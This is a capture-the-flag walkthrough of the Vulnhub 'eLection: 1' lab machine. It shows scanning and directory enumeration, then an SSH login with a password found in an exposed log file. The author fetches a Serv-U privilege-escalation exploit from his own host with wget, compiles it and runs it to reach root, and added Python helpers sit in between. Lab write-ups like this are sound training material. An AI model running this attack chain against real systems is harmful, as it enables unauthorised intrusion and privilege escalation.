Vulnhub: detailed walkthrough of the election machine
Election
Author: jason huawen
Target information
Name: eLection: 1
URL:
https://www.vulnhub.com/entry/election-1,503/
Identifying the IP address
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:3f:57:98 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:4a:57:01 1 60 PCS Systemtechnik GmbH
NMAP Scanning
Scan the target host with NMAP:
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 20:56 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20d1ed84cc68a5a786f0dab8923fd967 (RSA)
| 256 7889b3a2751276922af98d27c108a7b9 (ECDSA)
|_ 256 b8f4d661cf1690c5071899b07c70fdc0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:4A:57:01 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ curl http://192.168.56.254/robots.txt
admin
wordpress
user
election
Of the entries in robots.txt, only election is accessible.
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ nikto -h 192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-05-12 21:11:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 59558e1434548, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ 8254 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-05-12 21:11:46 (GMT-4) (14 seconds)
---------------------------------------------------------------------------
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,bak,js,txt
[+] Timeout: 10s
===============================================================
2023/05/12 21:19:13 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10918]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.254/javascript/]
/robots.txt (Status: 200) [Size: 30]
/election (Status: 301) [Size: 319] [--> http://192.168.56.254/election/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.254/phpmyadmin/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/phpinfo.php (Status: 200) [Size: 95437]
/server-status (Status: 403) [Size: 279]
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ gobuster dir -u http://192.168.56.254/election -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/election
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,bak,js,txt
[+] Timeout: 10s
===============================================================
2023/05/12 21:21:49 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 7003]
/media (Status: 301) [Size: 325] [--> http://192.168.56.254/election/media/]
/themes (Status: 301) [Size: 326] [--> http://192.168.56.254/election/themes/]
/data (Status: 301) [Size: 324] [--> http://192.168.56.254/election/data/]
/admin (Status: 301) [Size: 325] [--> http://192.168.56.254/election/admin/]
/lib (Status: 301) [Size: 323] [--> http://192.168.56.254/election/lib/]
/languages (Status: 301) [Size: 329] [--> http://192.168.56.254/election/languages/]
/js (Status: 301) [Size: 322] [--> http://192.168.56.254/election/js/]
/card.php (Status: 200) [Size: 1935]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 1538169 / 1543927 (99.63%)
If you only scan the /election directory with gobuster, you miss important information and may not be able to proceed at all.
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ curl http://192.168.56.254/election/card.php
00110000 00110001 00110001 00110001 00110000 00110001 00110000 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110001 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110001 00110000 00110000 00100000 00110000 00110000 00110000 00110000 00110001 00110000 00110001 00110000 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110000 00110000 00100000 00110000 00110001 00110001 00110000 00110000 00110000 00110000 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110001 00110001 00110000 00110001 00110000 00100000 00110000 00110001 00110000 00110001 00110001 00110000 00110001 00110000 00100000 00110000 00110001 00110001 00110001 00110001 00110000 00110000 00110000 00100000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110000 00110000 00110000 00110000 00110001 00100000 00110000 00110001 00110000 00110000 00110000 00110000 00110000 00110000 00100000 00110000 00110000 00110001 00110000 00110000 00110000 00110001 00110001
Decoded the binary data above, but it is of no use.
https://cryptii.com/pipes/binary-decoder
The quick brown 🦊 jumps over 13 lazy 🐶.
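The card.php body above is text in which every character has been written out as an 8-bit binary group, and the text it encodes is itself such a string, so a single pass through a decoder returns more ones and zeros. The Python below is an added example, not part of the original walkthrough: it repeats the decoding until the output no longer looks like binary. CARD_PHP is the card.php output from above, re-wrapped so that each line holds one encoded character plus an encoded space.

```python
import re

# card.php output from above (page data, re-wrapped: each line is one encoded
# character followed by an encoded space)
CARD_PHP = """
00110000 00110001 00110001 00110001 00110000 00110001 00110000 00110001 00100000
00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000
00110000 00110001 00110001 00110000 00110000 00110001 00110000 00110001 00100000
00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110000 00100000
00110000 00110000 00110001 00110001 00110001 00110000 00110001 00110000 00100000
00110000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00100000
00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00100000
00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110001 00100000
00110000 00110000 00110001 00110001 00110000 00110001 00110000 00110000 00100000
00110000 00110000 00110000 00110000 00110001 00110000 00110001 00110000 00100000
00110000 00110001 00110001 00110001 00110000 00110000 00110000 00110000 00100000
00110000 00110001 00110001 00110000 00110000 00110000 00110000 00110001 00100000
00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000
00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000
00110000 00110000 00110001 00110001 00110001 00110000 00110001 00110000 00100000
00110000 00110001 00110000 00110001 00110001 00110000 00110001 00110000 00100000
00110000 00110001 00110001 00110001 00110001 00110000 00110000 00110000 00100000
00110000 00110001 00110001 00110000 00110000 00110000 00110001 00110001 00100000
00110000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00100000
00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00100000
00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110001 00100000
00110000 00110000 00110001 00110000 00110000 00110000 00110000 00110001 00100000
00110000 00110001 00110000 00110000 00110000 00110000 00110000 00110000 00100000
00110000 00110000 00110001 00110000 00110000 00110000 00110001 00110001
"""

# One or more 8-bit groups separated by whitespace and nothing else.
BINARY_GROUPS = re.compile(r"(?:[01]{8}\s*)+")

def decode_layer(text: str) -> str:
    """Whitespace-separated 8-bit groups -> bytes -> UTF-8 text."""
    return bytes(int(g, 2) for g in text.split()).decode("utf-8")

def peel(text: str, max_layers: int = 8) -> tuple[str, int]:
    """Decode while the result still looks like binary; return (text, layers)."""
    current, layers = text.strip(), 0
    while layers < max_layers and BINARY_GROUPS.fullmatch(current):
        current = decode_layer(current).strip()
        layers += 1
    return current, layers

if __name__ == "__main__":
    plaintext, depth = peel(CARD_PHP)
    print(f"{depth} layer(s) removed:\n{plaintext}")
```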
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ dirb http://192.168.56.254/election/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 12 22:03:10 2023
URL_BASE: http://192.168.56.254/election/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.254/election/ ----
==> DIRECTORY: http://192.168.56.254/election/admin/
==> DIRECTORY: http://192.168.56.254/election/data/
+ http://192.168.56.254/election/index.php (CODE:200|SIZE:7003)
==> DIRECTORY: http://192.168.56.254/election/js/
==> DIRECTORY: http://192.168.56.254/election/languages/
==> DIRECTORY: http://192.168.56.254/election/lib/
==> DIRECTORY: http://192.168.56.254/election/media/
==> DIRECTORY: http://192.168.56.254/election/themes/
---- Entering directory: http://192.168.56.254/election/admin/ ----
==> DIRECTORY: http://192.168.56.254/election/admin/ajax/
==> DIRECTORY: http://192.168.56.254/election/admin/components/
==> DIRECTORY: http://192.168.56.254/election/admin/css/
==> DIRECTORY: http://192.168.56.254/election/admin/img/
==> DIRECTORY: http://192.168.56.254/election/admin/inc/
+ http://192.168.56.254/election/admin/index.php (CODE:200|SIZE:8964)
==> DIRECTORY: http://192.168.56.254/election/admin/js/
==> DIRECTORY: http://192.168.56.254/election/admin/logs/
==> DIRECTORY: http://192.168.56.254/election/admin/plugins/
---- Entering directory: http://192.168.56.254/election/data/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/ajax/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/logs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri May 12 22:03:14 2023
DOWNLOADED: 9224 - FOUND: 2
In fact, the /election/admin login is protected by a firewall, so brute forcing is not allowed.
http://192.168.56.254/election/admin/logs/
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ cat system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown I
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ ssh love@192.168.56.254
love@192.168.56.254's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
74 packages can be updated.
28 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Apr 9 23:19:28 2020 from 192.168.1.5
love@election:~$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
Logged in via SSH successfully:
love@election:~$ cd Desktop/
love@election:~/Desktop$ ls -alh
total 12K
drwxrwxrwx 2 love love 4.0K Apr 9 2020 .
drwsrwxrwx 18 love love 4.0K May 27 2020 ..
-rw-rw---- 1 love love 33 Apr 9 2020 user.txt
love@election:~/Desktop$ cat user.txt
cd38ac698c0d793a5236d01003f692b0
Privilege Escalation
love@election:/tmp$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
Escalate privileges via the SUID bit on Serv-U; strictly speaking this is not escalation through SUID as such, but through a local privilege-escalation vulnerability found in that service.
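From the defender's side, a SUID listing like the one above is triaged against a known-good baseline: anything not shipped by the distribution, or installed outside the package-managed directories (here /usr/local/Serv-U/Serv-U), is the binary to patch, strip of its SUID bit or remove. The Python below is an added example, not from the walkthrough; FIND_OUTPUT is the listing above, and BASELINE is an assumed allowlist that in practice you would generate from a clean install of the same release.

```python
# Constructed from the `find / -perm -4000 -type f` output shown above.
FIND_OUTPUT = """\
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
"""

# Assumed baseline of SUID files shipped by the distro packages on this image.
# Generate the real one from a clean install of the same release.
BASELINE = {
    "/usr/bin/arping", "/usr/bin/passwd", "/usr/bin/pkexec",
    "/usr/bin/traceroute6.iputils", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/sbin/pppd",
}

# Directories where package-managed binaries normally live.
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/lib/", "/usr/libexec/")

def triage_suid(find_output: str, baseline: set[str]) -> dict[str, list[str]]:
    """Classify each SUID path as 'expected' (in the baseline), 'unlisted'
    (not in the baseline) and, within unlisted, 'third_party' (outside the
    package-managed directories, e.g. under /usr/local or /opt)."""
    result = {"expected": [], "unlisted": [], "third_party": []}
    for line in find_output.splitlines():
        path = line.strip()
        if not path:
            continue
        if path in baseline:
            result["expected"].append(path)
            continue
        result["unlisted"].append(path)
        if not path.startswith(PACKAGED_PREFIXES):
            result["third_party"].append(path)
    return result

if __name__ == "__main__":
    for category, paths in triage_suid(FIND_OUTPUT, BASELINE).items():
        print(f"{category}: {len(paths)}")
        for p in paths:
            print(f"  {p}")
```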
love@election:/tmp$ wget http://192.168.56.253:8000/47009.c
--2023-05-13 11:15:14-- http://192.168.56.253:8000/47009.c
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [text/x-csrc]
Saving to: ‘47009.c’
47009.c 100%[============================================================================>] 619 --.-KB/s in 0s
2023-05-13 11:15:14 (128 MB/s) - ‘47009.c’ saved [619/619]
love@election:/tmp$ gcc 47009.c -o exploit
love@election:/tmp$ chmod +x exploit
love@election:/tmp$ ./exploit
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# cd /root
# ls -alh
total 44K
drwx------ 6 root root 4.0K May 13 06:22 .
drwxr-xr-x 24 root root 4.0K Apr 8 2020 ..
-rw------- 1 root root 66 May 27 2020 .bash_history
drwx------ 3 root root 4.0K Apr 8 2020 .cache
drwx------ 5 root root 4.0K May 27 2020 .config
drwx------ 3 root root 4.0K Oct 20 2019 .gnupg
drwxr-xr-x 3 root root 4.0K Oct 20 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Apr 9 2020 root.txt
-rw-r--r-- 1 root root 66 Apr 2 2020 .selected_editor
-rw-r----- 1 root root 5 May 13 06:22 .vboxclient-display-svga.pid
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6
#
STRIVE FOR PROGRESS, NOT FOR PERFECTION